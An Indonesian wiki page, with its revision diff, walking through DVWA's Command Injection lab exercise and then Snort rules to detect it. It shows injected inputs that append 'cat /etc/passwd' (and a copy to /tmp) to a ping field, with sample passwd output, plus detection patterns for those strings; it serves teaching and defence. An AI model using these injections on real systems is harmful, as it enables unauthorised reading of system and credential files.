Difference between revisions of "DVWA: Command Injection"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) (Created page with "* Login ke DVWA * Klik Command Injection * Ping isi IP yang bisa di ping misalnya, router anda, misalnya 192.168.0.223 * Hasilnya kira-kira PING 192.168.0.223 (192.168.0....") |
Onnowpurbo (talk | contribs) |
||
(5 intermediate revisions by the same user not shown) | |||
Line 39: | Line 39: | ||
.. | .. | ||
dst | dst | ||
+ | |||
+ | * Lihat source DVWA mengapa melakukan hal itu | ||
+ | |||
+ | cat /var/www/html/DVWA-1.9/vulnerabilities/exec/source/low.php | ||
+ | |||
+ | |||
+ | * Kalau iseng, coba copy password ke tmp, inject command | ||
+ | |||
+ | 192.168.1.106; cat /etc/passwd | tee /tmp/passwd | ||
+ | |||
+ | |||
+ | |||
+ | ==Snort Rule== | ||
+ | |||
+ | Untuk mendeteksi kegiatan ini, bisa tambahkan di snort local.rules beberapa alternatif rules berikut | ||
+ | |||
+ | alert tcp any any -> 192.168.0.100 80 (msg:"passwd"; content:"passwd"; nocase; classtype:web-application-attack; sid:1000020;) | ||
+ | alert tcp any any -> 192.168.0.100 80 (msg:"/passwd"; content:"%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000020;) | ||
+ | alert tcp any any -> 192.168.0.100 80 (msg:"/etc/passwd"; content:"%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000021;) | ||
+ | alert tcp any any -> 192.168.0.100 80 (msg:"cat /etc/passwd"; content:"cat+%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000022;) | ||
+ | alert tcp any any -> 192.168.0.100 80 (msg:"tee /tmp"; content:"tee+%2Ftmp"; nocase; classtype:web-application-attack; sid:1000023;) | ||
+ | |||
+ | apa saat memilih rules, sebaiknya pilih yang paling spesifik, jangan yang general. |
Latest revision as of 04:46, 1 April 2017
- Login ke DVWA
- Klik Command Injection
- Ping isi IP yang bisa di ping misalnya, router anda, misalnya
192.168.0.223
- Hasilnya kira-kira
PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data. 64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms 64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms 64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms 64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms --- 192.168.0.223 ping statistics --- 4 packets transmitted, 4 received, 0% packet loss, time 2999ms rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms
- Tambahkan perintah cat sesudah nomor IP, misalnya
192.168.0.223; cat /etc/passwd
PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data. 64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms 64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms 64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms 64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms --- 192.168.0.223 ping statistics --- 4 packets transmitted, 4 received, 0% packet loss, time 2999ms rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin .. .. dst
- Lihat source DVWA mengapa melakukan hal itu
cat /var/www/html/DVWA-1.9/vulnerabilities/exec/source/low.php
- Kalau iseng, coba copy password ke tmp, inject command
192.168.1.106; cat /etc/passwd | tee /tmp/passwd
Snort Rule
Untuk mendeteksi kegiatan ini, bisa tambahkan di snort local.rules beberapa alternatif rules berikut
alert tcp any any -> 192.168.0.100 80 (msg:"passwd"; content:"passwd"; nocase; classtype:web-application-attack; sid:1000020;) alert tcp any any -> 192.168.0.100 80 (msg:"/passwd"; content:"%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000020;) alert tcp any any -> 192.168.0.100 80 (msg:"/etc/passwd"; content:"%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000021;) alert tcp any any -> 192.168.0.100 80 (msg:"cat /etc/passwd"; content:"cat+%2Fetc%2Fpasswd"; nocase; classtype:web-application-attack; sid:1000022;) alert tcp any any -> 192.168.0.100 80 (msg:"tee /tmp"; content:"tee+%2Ftmp"; nocase; classtype:web-application-attack; sid:1000023;)
apa saat memilih rules, sebaiknya pilih yang paling spesifik, jangan yang general.